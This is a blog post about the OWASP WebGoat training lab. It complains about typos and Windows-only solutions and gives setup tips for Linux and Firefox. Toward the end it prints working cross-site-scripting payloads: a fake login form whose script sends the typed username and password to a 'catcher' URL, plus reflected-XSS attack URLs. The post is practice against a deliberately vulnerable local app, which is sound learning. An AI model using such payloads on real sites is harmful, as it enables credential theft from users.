OWASP's WebGoat seems like a good way to get some hands-on experience with vulnerabilities, and I must admit that it has been fun so far. Still, I expected something that has been out for so long and so well recommended to be a bit more polished. The typos are superficial, but it's not like it takes long to run a spell checker. Even the start page could use a word usage check(led vs. lead). A bigger problem lies in incomplete or inaccurate solutions/hints that make it more difficult to complete the lessons without any real gains other than a reminder that you can't guarrantee that everything works everywhere on everything for all time.
I found the CR vs LF note in the HTTP Splitting lesson helpful since I'm playing with it on Linux, but such notes on differences between Windows and Linux early on imply that there will be useful hints on the differences in later lessons, even if the solutions are only given for Windows. This is unfortunately not the case.
On top of centering around Windows, some of the solutions aren't even correct. There are mistakes in URLs from missing slashes to swapping in "catcher" for "capture". WebGoat does let you know when you've successfully completed something with check marks on the navigation panel, but when things that should be correct don't work on your setup, it can be a bit frustrating to find workarounds. For better or worse, the check-off for the Phishing w/ XSS lesson only checks that the "stolen" information is sent to the right place, not whether or not it came out of the lesson's page. I triggered that check-off twice, each time pasting perfectly fine code that didn't work with the lesson page into their own html pages and entering the username/password there. I isolated the problem to the inability to access "document.forms[0].user.value" in the lesson page, but it is currently unclear why that is the case.
A few notes on getting WebGoat V5.3 to work on Firefox on linux:
- Installation instructions say "Start your browser and browse to: http://localhost/WebGoat/attack. Notice the capital 'W' and 'G'".This didn't work but I noticed /tomcat/webapps/webgoat didn't have the capitalized W or G so I started it by going to http://127.0.0.1/webgoat/attack.
- The Getting Started page says, "If you are using WebScarab to test a site that is running the same computer as the browser (i.e. localhost or 127.0.0.1), and you are using IE7, you will need to add a dot "." after the hostname to force IE7 to use the proxy that you have configured." This is also true of Firefox, at least 3.5.8 on Ubuntu 9.10.
- Firebug wouldn't display the contents of a hidden table but I found the information by digging through the dom panel.
- Here are a few of the things I tried for Phishing w/ XSS. Again, neither of the first two would work when pasted in the box, but they triggered the check-off when in an html page by themselves and the login information was submitted.
- foo<script>function muahahaha(){ alert("User Name = " + document.forms[0].user.value + "; Password = " + document.forms[0].pass.value); XSSImage=new Image(); XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user=" + document.forms[0].user.value + "&password=" + document.forms[0].pass.value;}</script><form><br><br>login:<br><br>Enter Username:<br><input type="text" name="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="muahahaha()"></form>
- bar<form><br><br>login:<br><br>Enter Username:<br><input type="text" name="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="var XSSImage=new Image(); XSSImage.src='http://localhost/webgoat/catcher?PROPERTY=yes&user=' + this.form.user.value + '&password=' + this.form.pass.value;"></form>
- Substituting the variables with their values in the URL (http://localhost/webgoat/catcher?PROPERTY=yes&user=guest&password=guest) and pasting that in the box works fine, though that doesn't illustrate the vulnerability.
- An online solution video for the Stage 5 Reflected XSS lesson puts the script in the box but the instructions for the lesson are to craft a URL to give to someone else. This works for me:
- http://localhost./webgoat/attack?Screen=40&menu=900&search_name=foo<script>alert("Muahahahaha");</script>
&action=FindProfile
- http://localhost./webgoat/attack?Screen=40&menu=900&search_name=foo<script>alert("Muahahahaha");</script>